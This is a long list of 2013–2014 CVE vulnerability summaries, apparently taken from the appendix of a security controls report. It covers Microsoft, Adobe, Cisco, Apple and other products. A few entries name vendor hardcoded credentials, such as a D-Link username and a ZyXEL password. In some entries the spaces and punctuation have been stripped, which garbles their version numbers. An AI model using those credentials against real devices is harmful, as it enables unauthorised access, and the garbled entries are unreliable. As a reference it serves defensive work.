CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that log out the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account with username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".
